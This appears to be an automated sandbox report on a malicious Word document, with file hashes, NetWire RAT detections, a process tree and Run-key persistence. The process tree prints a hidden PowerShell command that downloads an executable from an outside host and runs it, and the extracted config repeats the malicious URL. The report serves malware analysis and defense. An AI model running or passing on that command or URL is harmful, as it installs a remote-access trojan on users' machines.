Analysis
-
max time kernel
81s -
max time network
143s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
13-01-2021 09:17
Static task
static1
Behavioral task
behavioral1
Sample
Pokana2021011357.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Pokana2021011357.doc
Resource
win10v20201028
General
-
Target
Pokana2021011357.doc
-
Size
55KB
-
MD5
9a59fc2435737333486d786264c40542
-
SHA1
19ccdcf1cdafdd248080f7a0b4a481057125ebdf
-
SHA256
ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
-
SHA512
eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5
Malware Config
Extracted
http://one.oziriss.club:2095/ol/o1.exe
Signatures
-
NetWire RAT payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1920-35-0x000000000009242D-mapping.dmp netwire behavioral1/memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmp netwire behavioral1/memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmp netwire behavioral1/memory/1336-45-0x00000000000D242D-mapping.dmp netwire behavioral1/memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmp netwire behavioral1/memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1916 1580 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1916 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
secure.exesecure.exefers.exefers.exepid process 1696 secure.exe 1920 secure.exe 1384 fers.exe 1336 fers.exe -
Loads dropped DLL 7 IoCs
Processes:
powershell.exesecure.exesecure.exefers.exepid process 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 1696 secure.exe 1920 secure.exe 1384 fers.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
fers.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ fers.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe" fers.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
secure.exefers.exedescription pid process target process PID 1696 set thread context of 1920 1696 secure.exe secure.exe PID 1384 set thread context of 1336 1384 fers.exe fers.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1580 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1916 powershell.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
WINWORD.EXEpid process 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE 1580 WINWORD.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
WINWORD.EXEpowershell.exesecure.exesecure.exefers.exedescription pid process target process PID 1580 wrote to memory of 1916 1580 WINWORD.EXE powershell.exe PID 1580 wrote to memory of 1916 1580 WINWORD.EXE powershell.exe PID 1580 wrote to memory of 1916 1580 WINWORD.EXE powershell.exe PID 1580 wrote to memory of 1916 1580 WINWORD.EXE powershell.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1916 wrote to memory of 1696 1916 powershell.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1696 wrote to memory of 1920 1696 secure.exe secure.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1920 wrote to memory of 1384 1920 secure.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe PID 1384 wrote to memory of 1336 1384 fers.exe fers.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\secure.exe"C:\Users\Admin\AppData\Local\Temp\secure.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\secure.exeC:\Users\Admin\AppData\Local\Temp\secure.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeC:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.pngMD5
8c6e2f2f47f6433efebd829c18f864d1
SHA115ebffc420841a18c1d47b6b40cfd9e7c632cf47
SHA25694dcac78e40e701792770b08478c6b2c788ec0a21a953d82e6f968a1cef8698d
SHA51286e2226fdb5bee0369d8f38bfb2e27270b9edd2b2d7c2fba76bacf51e8a53eeee1f21183bb7b75138757f198fe8513c423ce7fcbd7a740f37ca9ee68601c14db
-
\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
memory/1336-45-0x00000000000D242D-mapping.dmp
-
memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmpFilesize
192KB
-
memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmpFilesize
192KB
-
memory/1384-39-0x0000000000000000-mapping.dmp
-
memory/1580-2-0x00000000006E4000-0x00000000006E8000-memory.dmpFilesize
16KB
-
memory/1696-30-0x0000000000000000-mapping.dmp
-
memory/1916-7-0x0000000004650000-0x0000000004651000-memory.dmpFilesize
4KB
-
memory/1916-16-0x0000000006190000-0x0000000006191000-memory.dmpFilesize
4KB
-
memory/1916-25-0x00000000064B0000-0x00000000064B1000-memory.dmpFilesize
4KB
-
memory/1916-3-0x0000000000000000-mapping.dmp
-
memory/1916-24-0x0000000006400000-0x0000000006401000-memory.dmpFilesize
4KB
-
memory/1916-17-0x00000000062B0000-0x00000000062B1000-memory.dmpFilesize
4KB
-
memory/1916-4-0x000000006AFA0000-0x000000006B68E000-memory.dmpFilesize
6.9MB
-
memory/1916-11-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB
-
memory/1916-6-0x00000000046D0000-0x00000000046D1000-memory.dmpFilesize
4KB
-
memory/1916-5-0x0000000001E60000-0x0000000001E61000-memory.dmpFilesize
4KB
-
memory/1916-8-0x0000000005280000-0x0000000005281000-memory.dmpFilesize
4KB
-
memory/1920-35-0x000000000009242D-mapping.dmp
-
memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmpFilesize
192KB
-
memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmpFilesize
192KB